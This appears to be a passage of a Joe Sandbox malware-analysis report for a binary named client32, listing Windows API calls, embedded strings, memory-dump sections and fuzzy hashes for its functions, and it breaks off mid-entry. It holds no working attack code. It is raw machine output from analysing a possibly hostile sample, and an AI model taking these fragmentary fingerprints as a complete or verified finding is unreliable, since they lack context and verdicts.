                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                                • String ID: CLTCONN.CPP
                                                                                • API String ID: 183652615-2872349640
                                                                                • Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                                • Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 1108F7BC
                                                                                • __CxxThrowException@8.LIBCMT ref: 1108F7D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                • String ID: L
                                                                                • API String ID: 1338273076-2909332022
                                                                                • Opcode ID: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
                                                                                • Instruction ID: 369f405687447c84649efdd58832c02068d177a3a0274ca2d5cff2ffa4839110
                                                                                • Opcode Fuzzy Hash: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
                                                                                • Instruction Fuzzy Hash: 9F3160B5D04259AEEB11DFA4C840BDEFBF8FB08314F14426EE915A7280D775A904CBA1
                                                                                APIs
                                                                                • FormatMessageA.KERNEL32(00000400,?,00000000,00000000,00000010,00000401,?,?,76968400,00000010), ref: 111478DB
                                                                                • wvsprintfA.USER32(00000010,?,?), ref: 111478F2
                                                                                Strings
                                                                                • ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114790A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FormatMessagewvsprintf
                                                                                • String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
                                                                                • API String ID: 65494530-3330918973
                                                                                • Opcode ID: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
                                                                                • Instruction ID: 19ecc3acc586c3c0044aa7ac842438cb7b35c94f742bf7000cc937f5be2b0cb7
                                                                                • Opcode Fuzzy Hash: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
                                                                                • Instruction Fuzzy Hash: 3E21B6B5D0026DAEEB10CF90DC81FEAFBBCEB44618F104169E61993640E7756E44CBE5
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 110AD1E3
                                                                                  • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2
                                                                                • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                                Strings
                                                                                • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad_memset
                                                                                • String ID: winscard.dll is NOT valid!!!
                                                                                • API String ID: 212038770-1939809930
                                                                                • Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                • Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
                                                                                • Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                • Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                • String ID: string too long
                                                                                • API String ID: 963545896-2556327735
                                                                                • Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                • Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
                                                                                • Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                • Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
APIs
• GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
• SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ItemText
• String ID: ...
• API String ID: 3367045223-440645147
• Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
• Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
• Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
• Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
APIs
• ShowWindow.USER32(8D111949,00000009,?,?,?,?,?,?,?,?,?,?,110BA876,110C032C), ref: 110B977B
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004C), ref: 110B8AF2
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004D), ref: 110B8AF9
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004E), ref: 110B8B00
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004F), ref: 110B8B07
  • Part of subcall function 110B8AC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8B16
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(?), ref: 110B8B24
  • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(00000001), ref: 110B8B33
• MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B97A3
Strings
• j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B97BD
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: System$Metrics$Window$InfoMoveParametersShow
• String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
• API String ID: 2940908497-693965840
• Opcode ID: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
• Instruction ID: 55e82b17da46594b085dc316db9a602337c46ecd43c839d0c1f018f75bd6c70b
• Opcode Fuzzy Hash: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
• Instruction Fuzzy Hash: DA21E875B0060AAFDB08DFA8C995DBEF7B5FB88304F104268E519A7354DB30AD41CBA4
APIs
• ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111459F6
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EnvironmentExpandFileModuleNameStrings
• String ID: :
• API String ID: 2034136378-336475711
• Opcode ID: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
• Instruction ID: 2f025fe159ad018ca32f107a988c6b97e10c7b7f69d8ea9c63f353a653f43b24
• Opcode Fuzzy Hash: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
• Instruction Fuzzy Hash: 65213738C043599FDB21CF64CC44FD9BB68AF16708F6041D4D59967942EF706A8DCBA1
APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 11043784
• GetClassNameA.USER32(?,?,00000040), ref: 11043799
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ClassNameProcessThreadWindow
• String ID: tooltips_class32
• API String ID: 2910564809-1918224756
• Opcode ID: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
• Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
• Opcode Fuzzy Hash: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
• Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790
APIs
  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
  • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
  • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
• SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
• _memset.LIBCMT ref: 11039216
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ItemText$Window$ObjectRectShow_memset
• String ID: 878411
• API String ID: 3037201586-3415530111
• Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
• Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
• Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
• Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
APIs
• RegQueryValueExA.ADVAPI32(00020019,?,00000000,1B702977,00000000,00020019,?,00000000), ref: 110ED600
  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: QueryValuewvsprintf
• String ID: ($Error %d getting %s
• API String ID: 141982866-3697087921
• Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
• Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
• Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
• Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                Strings
                                                                                • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                                • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Similarity
                                                                                • API ID: _memset
                                                                                • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                                • API String ID: 2102423945-1777407139
                                                                                • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
